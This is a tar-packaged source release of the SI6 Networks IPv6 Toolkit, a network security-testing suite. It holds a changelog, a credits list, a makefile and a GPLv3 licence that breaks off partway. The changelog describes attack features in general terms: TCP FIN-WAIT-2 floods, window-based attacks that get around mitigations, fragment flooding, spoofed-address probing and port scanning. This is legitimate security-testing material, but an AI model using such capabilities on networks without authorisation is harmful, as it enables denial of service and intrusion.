pax_global_header00006660000000000000000000000064125436045500014516gustar00rootroot0000000000000052 comment=97741d2c6d2e9b48b5f8ee67fcc85947a7423b4f ipv6toolkit-2.0+ds.1/000077500000000000000000000000001254360455000144125ustar00rootroot00000000000000ipv6toolkit-2.0+ds.1/CHANGES.TXT000066400000000000000000000200231254360455000160600ustar00rootroot00000000000000SI6 Networks IPv6 Toolkit v2.0 (Guille) * path6: New tool Added a fully-IPv6-capable traceroute tool, named path6. * script6: New tool Added a new tool which incorporates new functionality and also provides a shortcut to other existing tools. * blackhole6: New tool Added a new tool isolates IPv6 blackholes. * udp6: New tool Added a new tool that can send arbirary UDP/IPv6 packets. * All: Fix bug when reading packets lipcap "internals" together with select() would cause (at times) delays when reading packets. * All: Add support for Solaris Solaris is now a supported platform. * All: Fix bug in next hop determination A bug caused, in some scenarios, the tools to fail with "cannot find next hop". * All: Fix support for loopback interface The tools failed to set the "virtual" "Ether Proto" for packets sent on the loopback interface, and hence they were discarded. * All: Add support for domain names All tools now support domain names in their "-d" options. * addr6: Fix bug in address scope filtering A bug caused address scope filters to behave incorrectly. * addr6: Fix error in manual page Some of the long-option names were incorrect. * scan6: Fixes bug in address range computation Prefixes that were not multiple of 16 resulted in bogus address ranges. * scan6: Add support for port scanning scan6 now implements several techniques for TCP and UDP port scanning. * scan6: Add support for heuristic host scanning scan6 can now automatically infer the IID type of a target and reduce the search space accordingly (just "-d example.com/64" or "-d IPV6ADDRESS/64". * tcp6: Add TCP probe mode Probe mode allows you to employ tcp6 for simple probing (e.g., port scanning) * tcp6: Add "--open-mode" and "--close-mode" options These two options allow you to cause a TCP connection at a remote node to transition to any specific state (and hene perform e.g., FIN-WAIT-2 floods) * tcp6: Add "--data" option This options allows to set a specific TCP payload from the command-line (e.g., an HTTP "GET" command). * script6: Fix bug in get-aaaa, get-ns, and get-mx Domains that had a CNAME would be skipped. * frag6: Fix bug in Frag ID assessment Probes are now sent every 10ms rather than in batches, to minimize packet reordering. SI6 Networks IPv6 Toolkit v1.5.3 * All: Fix packet size issues Many tools were using a (sometimes non-initialized) max_packet_size variable, instead of the corresponding member of the idata structure. * All: Add support for some Mac OS version The toolkit would not compile on Lion (10.7.5) or Snow Leopard (10.6.8), as a result of inconsistencies of how BYTE_ORDER-related constants were (not) set in those versions of Mac OS. SI6 Networks IPv6 Toolkit v1.5.2 * All: Add support for GNU Debian/kfreebsd The toolkit would not build on GNU Debian/kfreebsd before this release. * tcp6: Add support for TCP/IPv6 probes tcp6 can now send TCP/IPv6 packets ("--probe-mode" option), and read the TCP response packets, if any. This can be leveraged for port scans, and miscellaneous measurements. SI6 Networks IPv6 Toolkit v1.5.1 * Fix Mac OS breakage libipv6.h had incorrect definitions for "struct tcp_hdr". SI6 Networks IPv6 Toolkit v1.5 * All: Improved the next-hop determination Since the toolkit employs libpcap (as there is no portable way to forge IPv6 addresses and do other tricks), it was relying on the user specifying a network interface ("-i" was mandatory for all tools) and that routers would send Router Advertisements on the local links. This not only was rather inconvenient for users (specifying a network interface was not warranted), but also meant that in setups where RAs where not available (e.g., manual configuration), the tools would fail. The toolkit now employs routing sockets (in BSDs) or Netlink (in Linux), and only uses "sending RAs" as a fall-back in case of failure (IPv6 not configured on the local host). * All: Improved source address selection This is closely related to the previous bullet. * All: More code moved to libipv6 More and more code was moved to libipv6 and removed to the individual tool source files. As with some of the above, this was painful and time-consuming, but was necessary -- and in the long run it will make code maintenance easier. * All: libipv6 used throughout all tools This was rather painful and non-exciting, but necessary. SI6 Networks' IPv6 Toolkit v1.4.1 * frag6: Fixed bug that prevented Ethernet header from being filled A bug in the code caused Ethernet frames to go on the wire without any of their header fields completed. * All: Use of library to avoid code replication An "libipv6" library was created, such that common functions do not need to be replicated for each tool. ni6, ns6, rs6, and tcp6 now employ such library. SI6 Networks' IPv6 Toolkit v1.4 release * frag6: Fixed the flooding option Fixed the fragment size used when employing the flooding option. It was previously sending fragment sizes that where not a multiple of eight, and hence these fragments were dropped. * scan6: Added support for 64-bit encoding of IPv4 addresses Option "--tgt-ipv4" was augmented to support both encodings (32 bit and 64 bit) of embedded IPv4 addresses. * tcp6: Fixed response to Neighbor Solicitations tcp6 was not responding to incoming Neighbor Solicitations. Hence, when packets were sent from spoofed addresses, tcp6 would never receive the response packets, because the NSs sent by the local router or target node would never be responded. * tcp6: Added support for TCP Window-based attacks tcp6 can now close the window after sending an app-layer command, and also "modulate" the TCP window to circumvent trivial mitigations for these attacks ("--window-mode" and "--win-modulate" options). * tcp6: Support for multiple connection-establishment types tcp6 can now cause e.g. TCP simultaneous opens (see the "--open-mode" option). * tcp6: Support for multiple connection-termination types tcp6 can now perform multiple connection-termination types (see the "--close-mode" option). * tcp6: Support for sending application layer requests tcp6 can now send application-layer requests with the "--data" option. * Many improvements to the manual pages. Fixed the troff encoding of many manual pages. Added ipv6toolkit(7), that describes a general description of the toolkit. * All: Fixed bug in link-layer destination address selection Tools now try to find a local router or perform Neighbor Discovery only when necessary (i.e., underlying link-layer is *not* loopback or tunnel, destination address is *not* link-local, and a link-layer destination address has *not* been specified). * All: Fixed bug in option handling Incorrect data type was used for the return value of getopt_long(), thus leading to problems in some architectures. * All: Fixed a number of issues with pcap_next_ex() The timeout parameter of pcap_next_ex() is now based on the platform (the previous constant value had different semantics in different platforms). Additionally, handle the case where pcap_next_ex() returns no packets. * All: General improvements and clean-up The development process now includes building the toolkit with the clang compiler (in addition to gcc), which has lead to the identification of a number of issues. * All: Improved support for building the toolkit. The toolkit now contains one makefile for pmake, and another for GNU make. Added support for the DESTDIR variable. Appropriate paths are selected based on the value of a number of variables. Configuration file is dynamically generated, with the right path to the oui.txt file. ipv6toolkit-2.0+ds.1/CREDITS.TXT000066400000000000000000000030301254360455000161040ustar00rootroot00000000000000CREDITS ------- ** Contributors ** The following people sent patches that were incorporated into this release of the toolkit: Octavio Alvarez Alexander Bluhm Alistair Crooks Declan A Rieb ** Package maintainers ** Availability of packages for different operating systems makes it easier for users to install and update the toolkit, and for the toolkit to integrate better with the operating systems. These are the maintainers for each of the different packages: + Debian Octavio Alvarez , sponsored by Luciano Bello + FreeBSD Hiroki Sato + Gentoo Linux Robin H. Johnson + Mac OS Declan A Rieb tests the toolkit on multiple Mac OS versions, to ensure clean compiles on such platforms. + NetBSD (pkgsrc framework) Alistair Crooks + OpenBSD Alexander Bluhm ** Troubleshooting/Debugging ** Spotting bugs in networking tool can be tricky, since at times they only show up in specific network scenarios. The following indviduals provided great help in identifying bugs in the toolkit (thus leading to fixes and improvements): Stephane Bortzmeyer Marc Heuse Erik Muller Declan A Rieb Tim Ray Hunter ipv6toolkit-2.0+ds.1/GNUmakefile000066400000000000000000000210731254360455000164670ustar00rootroot00000000000000# # SI6 Networks' IPv6 toolkit Makefile (for GNU make) # # Notes to package developers: # # By default, binaries will be installed in /usr/local/bin, manual pages in # /usr/local/man, data files in /usr/local/share/ipv6toolkit, and configuration # files in /etc # # The path of the binaries and data files can be overriden by setting "PREFIX" # variable accordingly. The path of the manual pages can be overriden by setting # the MANPREFIX variable. Typically, packages will set these variables as follows: # # PREFIX=/usr/ # MANPREFIX=/usr/share # # Finally, please note that this makefile supports the DESTDIR variable, as # typically employed by package developers. CC= gcc CFLAGS+= -Wall LDFLAGS+= -lpcap -lm ifeq ($(shell uname),SunOS) LDFLAGS+=-lsocket -lnsl OS=SunOS endif ifndef PREFIX PREFIX=/usr/local ifndef MANPREFIX MANPREFIX=/usr/local endif else ifndef MANPREFIX MANPREFIX=/usr/share endif endif ETCPATH= $(DESTDIR)/etc MANPATH= $(DESTDIR)$(MANPREFIX)/man DATAPATH= $(DESTDIR)$(PREFIX)/share/ipv6toolkit BINPATH= $(DESTDIR)$(PREFIX)/bin SBINPATH= $(DESTDIR)$(PREFIX)/sbin SRCPATH= tools SBINTOOLS= blackhole6 flow6 frag6 icmp6 jumbo6 na6 ni6 ns6 path6 ra6 rd6 rs6 scan6 script6 tcp6 udp6 BINTOOLS= addr6 TOOLS= $(BINTOOLS) $(SBINTOOLS) LIBS= libipv6.o all: $(TOOLS) data/ipv6toolkit.conf addr6: $(SRCPATH)/addr6.c $(SRCPATH)/addr6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o addr6 $(SRCPATH)/addr6.c $(LIBS) $(LDFLAGS) blackhole6: $(SRCPATH)/blackhole6 cp $(SRCPATH)/blackhole6 ./ flow6: $(SRCPATH)/flow6.c $(SRCPATH)/flow6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o flow6 $(SRCPATH)/flow6.c $(LIBS) $(LDFLAGS) frag6: $(SRCPATH)/frag6.c $(SRCPATH)/frag6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o frag6 $(SRCPATH)/frag6.c $(LIBS) $(LDFLAGS) icmp6: $(SRCPATH)/icmp6.c $(SRCPATH)/icmp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o icmp6 $(SRCPATH)/icmp6.c $(LIBS) $(LDFLAGS) jumbo6: $(SRCPATH)/jumbo6.c $(SRCPATH)/jumbo6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o jumbo6 $(SRCPATH)/jumbo6.c $(LIBS) $(LDFLAGS) na6: $(SRCPATH)/na6.c $(SRCPATH)/na6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o na6 $(SRCPATH)/na6.c $(LIBS) $(LDFLAGS) ni6: $(SRCPATH)/ni6.c $(SRCPATH)/ni6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ni6 $(SRCPATH)/ni6.c $(LIBS) $(LDFLAGS) ns6: $(SRCPATH)/ns6.c $(SRCPATH)/ns6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ns6 $(SRCPATH)/ns6.c $(LIBS) $(LDFLAGS) path6: $(SRCPATH)/path6.c $(SRCPATH)/path6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o path6 $(SRCPATH)/path6.c $(LIBS) $(LDFLAGS) ra6: $(SRCPATH)/ra6.c $(SRCPATH)/ra6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ra6 $(SRCPATH)/ra6.c $(LIBS) $(LDFLAGS) rd6: $(SRCPATH)/rd6.c $(SRCPATH)/rd6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rd6 $(SRCPATH)/rd6.c $(LIBS) $(LDFLAGS) rs6: $(SRCPATH)/rs6.c $(SRCPATH)/rs6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rs6 $(SRCPATH)/rs6.c $(LIBS) $(LDFLAGS) scan6: $(SRCPATH)/scan6.c $(SRCPATH)/scan6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o scan6 $(SRCPATH)/scan6.c $(LIBS) $(LDFLAGS) script6: $(SRCPATH)/script6 cp $(SRCPATH)/script6 ./ tcp6: $(SRCPATH)/tcp6.c $(SRCPATH)/tcp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o tcp6 $(SRCPATH)/tcp6.c $(LIBS) $(LDFLAGS) udp6: $(SRCPATH)/udp6.c $(SRCPATH)/udp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o udp6 $(SRCPATH)/udp6.c $(LIBS) $(LDFLAGS) libipv6.o: $(SRCPATH)/libipv6.c $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -c -o libipv6.o $(SRCPATH)/libipv6.c data/ipv6toolkit.conf: echo "# SI6 Networks' IPv6 Toolkit Configuration File" > \ data/ipv6toolkit.conf echo OUI-Database=$(PREFIX)/share/ipv6toolkit/oui.txt >> \ data/ipv6toolkit.conf echo Ports-Database=$(PREFIX)/share/ipv6toolkit/service-names-port-numbers.csv >> \ data/ipv6toolkit.conf clean: rm -f $(TOOLS) $(LIBS) rm -f data/ipv6toolkit.conf install: all ifneq ($(OS),SunOS) # Install the binaries install -m0755 -d $(BINPATH) install -m0755 -d $(SBINPATH) install -m0755 $(BINTOOLS) $(BINPATH) install -m0755 $(SBINTOOLS) $(SBINPATH) # Install the configuration file install -m0755 -d $(ETCPATH) install -m0644 data/ipv6toolkit.conf $(ETCPATH) # Install the IEEE OUI database install -m0755 -d $(DATAPATH) install -m0644 data/oui.txt $(DATAPATH) # Install the port numbers database install -m0644 data/service-names-port-numbers.csv $(DATAPATH) # Install the manual pages install -m0755 -d $(MANPATH)/man1 install -m0644 manuals/*.1 $(MANPATH)/man1 install -m0755 -d $(MANPATH)/man5 install -m0644 manuals/*.5 $(MANPATH)/man5 install -m0755 -d $(MANPATH)/man7 install -m0644 manuals/*.7 $(MANPATH)/man7 else # Install the binaries install -m 0755 -d $(BINPATH) install -m 0755 -d $(SBINPATH) install -m 0755 -f $(BINPATH) addr6 install -m 0755 -f $(SBINPATH) blackhole6 install -m 0755 -f $(SBINPATH) flow6 install -m 0755 -f $(SBINPATH) frag6 install -m 0755 -f $(SBINPATH) icmp6 install -m 0755 -f $(SBINPATH) jumbo6 install -m 0755 -f $(SBINPATH) script6 install -m 0755 -f $(SBINPATH) na6 install -m 0755 -f $(SBINPATH) ni6 install -m 0755 -f $(SBINPATH) ns6 install -m 0755 -f $(SBINPATH) path6 install -m 0755 -f $(SBINPATH) ra6 install -m 0755 -f $(SBINPATH) rd6 install -m 0755 -f $(SBINPATH) rs6 install -m 0755 -f $(SBINPATH) scan6 install -m 0755 -f $(SBINPATH) tcp6 install -m 0755 -f $(SBINPATH) udp6 # Install the configuration file install -m 0755 -d $(ETCPATH) install -m 0644 -f $(ETCPATH) data/ipv6toolkit.conf # Install the IEEE OUI database install -m 0755 -d $(DATAPATH) install -m 0644 -f $(DATAPATH) data/oui.txt # Install the port numbers database install -m 0644 -f $(DATAPATH) data/service-names-port-numbers.csv # Install the manual pages install -m 0755 -d $(MANPATH)/man1 install -m 0644 -f $(MANPATH)/man1 manuals/addr6.1 install -m 0644 -f $(MANPATH)/man1 manuals/blackhole6.1 install -m 0644 -f $(MANPATH)/man1 manuals/flow6.1 install -m 0644 -f $(MANPATH)/man1 manuals/frag6.1 install -m 0644 -f $(MANPATH)/man1 manuals/icmp6.1 install -m 0644 -f $(MANPATH)/man1 manuals/jumbo6.1 install -m 0644 -f $(MANPATH)/man1 manuals/na6.1 install -m 0644 -f $(MANPATH)/man1 manuals/ni6.1 install -m 0644 -f $(MANPATH)/man1 manuals/ns6.1 install -m 0644 -f $(MANPATH)/man1 manuals/path6.1 install -m 0644 -f $(MANPATH)/man1 manuals/ra6.1 install -m 0644 -f $(MANPATH)/man1 manuals/rd6.1 install -m 0644 -f $(MANPATH)/man1 manuals/rs6.1 install -m 0644 -f $(MANPATH)/man1 manuals/scan6.1 install -m 0644 -f $(MANPATH)/man1 manuals/script6.1 install -m 0644 -f $(MANPATH)/man1 manuals/tcp6.1 install -m 0644 -f $(MANPATH)/man1 manuals/udp6.1 install -m 0755 -d $(MANPATH)/man5 install -m 0644 -f $(MANPATH)/man5 manuals/ipv6toolkit.conf.5 install -m 0755 -d $(MANPATH)/man7 install -m 0644 -f $(MANPATH)/man7 manuals/ipv6toolkit.7 endif uninstall: # Remove the binaries rm -f $(BINPATH)/addr6 rm -f $(SBINPATH)/blackhole6 rm -f $(SBINPATH)/flow6 rm -f $(SBINPATH)/frag6 rm -f $(SBINPATH)/icmp6 rm -f $(SBINPATH)/jumbo6 rm -f $(SBINPATH)/script6 rm -f $(SBINPATH)/na6 rm -f $(SBINPATH)/ni6 rm -f $(SBINPATH)/ns6 rm -f $(SBINPATH)/path6 rm -f $(SBINPATH)/ra6 rm -f $(SBINPATH)/rd6 rm -f $(SBINPATH)/rs6 rm -f $(SBINPATH)/scan6 rm -f $(SBINPATH)/tcp6 rm -f $(SBINPATH)/udp6 # Remove the configuration file rm -f $(ETCPATH)/ipv6toolkit.conf # Remove the IEEE OUI database and port number database rm -rf $(DATAPATH) # Remove the manual pages rm -f $(MANPATH)/man1/addr6.1 rm -f $(MANPATH)/man1/blackhole6.1 rm -f $(MANPATH)/man1/flow6.1 rm -f $(MANPATH)/man1/frag6.1 rm -f $(MANPATH)/man1/icmp6.1 rm -f $(MANPATH)/man1/jumbo6.1 rm -f $(MANPATH)/man1/na6.1 rm -f $(MANPATH)/man1/ni6.1 rm -f $(MANPATH)/man1/ns6.1 rm -f $(MANPATH)/man1/path6.1 rm -f $(MANPATH)/man1/ra6.1 rm -f $(MANPATH)/man1/rd6.1 rm -f $(MANPATH)/man1/rs6.1 rm -f $(MANPATH)/man1/scan6.1 rm -f $(MANPATH)/man1/script6.1 rm -f $(MANPATH)/man1/tcp6.1 rm -f $(MANPATH)/man1/udp6.1 rm -f $(MANPATH)/man5/ipv6toolkit.conf.5 rm -f $(MANPATH)/man7/ipv6toolkit.7 ipv6toolkit-2.0+ds.1/LICENSE.TXT000066400000000000000000001045131254360455000161010ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of 